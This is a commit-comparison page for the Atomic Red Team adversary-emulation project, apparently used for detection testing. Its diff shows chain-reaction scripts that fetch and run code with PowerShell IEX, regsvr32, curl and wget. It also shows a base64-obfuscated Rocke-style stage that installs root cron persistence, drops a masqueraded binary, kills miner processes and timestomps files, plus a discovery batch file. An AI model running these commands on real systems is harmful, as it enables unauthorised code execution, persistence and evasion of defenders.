security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:update-PSDocs
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:ProcessHolllowingT1093
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

2 Commits
update-PSDocs .. ProcessHolllowingT1093

Author SHA1 Message Date
CircleCI Atomic Red Team doc generator 9a9a2b8147 Generate docs from job=validate_atomics_generate_docs branch=ProcessHolllowingT1093 2018-08-17 16:54:25 +00:00
caseysmithrc b1f1cdeb0e T1093 2018-08-17 10:54:04 -06:00
278 changed files with 74788 additions and 129383 deletions
Expand all files Collapse all files
.github/issue_template.md
-26
View File
@@ -1,26 +0,0 @@
# Report
## What did you do?
Please replace this with what you did.
e.g. Run `regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll`
## What did you expect to happen?
Please replace this with what you expected to happen.
e.g. The atomic test executes and `calc.exe` is launched.
## What happened instead?
Please replace this with of what happened instead.
e.g. 💥
## Your Environment
* Which *specific* operating system are you running (e.g. Windows 7 SP1 32-bit)?
* Did you run the test from an elevated or root prompt?
* If relevant, which atomic test is this specific to?
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
.github/pull_request_template.md
-8
View File
@@ -1,8 +0,0 @@
**Details:**
<!-- Insert details about this change here. Please include as much detail as possible -->
**Testing:**
<!-- Note any testing done, local or automated here. -->
**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->
ARTifacts/Chain_Reactions/atomic-hello
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
-11
View File
@@ -1,11 +0,0 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+2 -2
View File
@@ -8,11 +8,11 @@ $temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+1 -1
View File
@@ -16,7 +16,7 @@ SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:http
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+1 -1
View File
@@ -36,7 +36,7 @@ tasklist.exe | findstr defender
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
-10
View File
@@ -1,10 +0,0 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
-81
View File
@@ -1,81 +0,0 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
-90
View File
@@ -1,90 +0,0 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Labs/Webinar11062017-Labs.bat
+1 -1
View File
@@ -22,7 +22,7 @@ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-t
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
ARTifacts/Misc/Discovery.bat
-44
View File
@@ -1,44 +0,0 @@
net user Administrator /domain
net Accounts
net localgroup administrators
net use
net share
net group "domain admins" /domain
net config workstation
net accounts
net accounts /domain
net view
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
